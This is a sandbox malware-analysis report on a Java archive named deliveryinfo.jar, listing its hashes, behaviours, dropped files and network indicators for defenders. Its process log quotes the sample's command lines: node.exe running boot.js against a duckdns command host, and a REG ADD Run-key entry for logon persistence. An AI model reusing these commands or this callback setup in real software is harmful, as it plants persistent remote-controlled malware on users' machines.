analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

deliveryinfo.jar

Full analysis: https://app.any.run/tasks/54eefd28-e707-4a1f-b45d-9dee8f2f2f89
Verdict: Malicious activity
Analysis date: September 30, 2020, 03:23:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5:

724141C6922AB8E19C262D269AA8AEE1

SHA1:

0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0

SHA256:

A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D

SSDEEP:

12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • reg.exe (PID: 3420)

  • SUSPICIOUS

    • Application launched itself

      • javaw.exe (PID: 2280)
      • node.exe (PID: 3968)
      • node.exe (PID: 1208)

    • Executes JAVA applets

      • javaw.exe (PID: 2280)

    • Executable content was dropped or overwritten

      • javaw.exe (PID: 572)

    • Creates files in the user directory

      • javaw.exe (PID: 572)

    • Reads CPU info

      • node.exe (PID: 2932)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3996)

    • Starts CMD.EXE for commands execution

      • node.exe (PID: 2932)

  • INFO

    • Dropped object may contain Bitcoin addresses

      • javaw.exe (PID: 572)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0808
ZipCompression: Deflated
ZipModifyDate: 2020:09:25 16:24:26
ZipCRC: 0x00000000
ZipCompressedSize: 2
ZipUncompressedSize: -
ZipFileName: META-INF/
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
0
Suspicious processes
5

Behavior graph

Click at the process to see the details
start javaw.exe no specs javaw.exe node.exe node.exe no specs node.exe cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
2280"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exeexplorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
572"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\4e5716af.tmpC:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
javaw.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
0
Version:
8.0.920.14
3968C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exe
javaw.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Exit code:
0
Version:
14.12.0
1208C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exenode.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Version:
14.12.0
2932C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.orgC:\Users\admin\node-v14.12.0-win-x86\node.exe
node.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Version:
14.12.0
3996C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"""C:\Windows\system32\cmd.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3420REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "e8529f2a-975c-451b-9760-2a0bb1500d9d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""C:\Windows\system32\reg.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
39
Read events
38
Write events
1
Delete events
0

Modification events

(PID) Process:(3420) reg.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:e8529f2a-975c-451b-9760-2a0bb1500d9d
Value:
cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs"
Executable files
2
Suspicious files
2
Text files
3 597
Unknown types
7

Dropped files

PID
Process
Filename
Type
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node.exe
MD5:
SHA256:
2280javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:A60F0E34D8C3555E66C3B82E3E190E95
SHA256:56F928ACE68645241E155C043C89E011F0562C3AF92B00B56E392792B4C4ACE9
572javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:B5F695B7ED72F26866D96972FCCCFB88
SHA256:C93AAE75B3445164FDDF214D051529A2A12914A4B3A4604CF73CEAF5ACBBC32B
2280javaw.exeC:\Users\admin\AppData\Local\Temp\4e5716af.tmpjava
MD5:724141C6922AB8E19C262D269AA8AEE1
SHA256:A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\bin\npm.cmdtext
MD5:D5B5ACB61C9BF69FB8BFC65EBA28C6AB
SHA256:AFA68B96334EA8493BCB908743AF3DBD619CF26BE7B44460179ABD4D75D849D2
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\nodevars.battext
MD5:E6636C5B093F5CC13DFB7508305B8D8B
SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
572javaw.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2fdbf
MD5:C8366AE350E7019AEFC9D1E6E6A498C6
SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\node_modules\npm\.mailmaptext
MD5:50FF5F4745B5210D1DDC6CB3AD21216B
SHA256:EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\CHANGELOG.mdhtml
MD5:5F15C768C60610B0F12C9BDE18D5EF36
SHA256:5025CB1E5A255FB05B0E1263BE2AE9652EC95B0D380FCEBF88863E8BADF1B894
572javaw.exeC:\Users\admin\node-v14.12.0-win-x86.tmp319142314360\node-v14.12.0-win-x86\LICENSEtext
MD5:A249503208BA72F4ABC790A08C1025C5
SHA256:6C351F95A850B485A662E8B43003D8CA56CD663BE625981D7203A05D2CF587E0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
6
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3968
node.exe
94.156.189.108:443
hazeman222.duckdns.org
BelCloud Hosting Corporation
BG
unknown
2932
node.exe
94.156.189.108:443
hazeman222.duckdns.org
BelCloud Hosting Corporation
BG
unknown
572
javaw.exe
104.20.22.46:443
nodejs.org
Cloudflare Inc
US
shared
2932
node.exe
95.217.228.176:443
wtfismyip.com
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
nodejs.org
  • 104.20.22.46
  • 104.20.23.46
whitelisted
hazeman222.duckdns.org
  • 94.156.189.108
malicious
wtfismyip.com
  • 95.217.228.176
shared

Threats

PID
Process
Class
Message
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
deliveryinfo.jar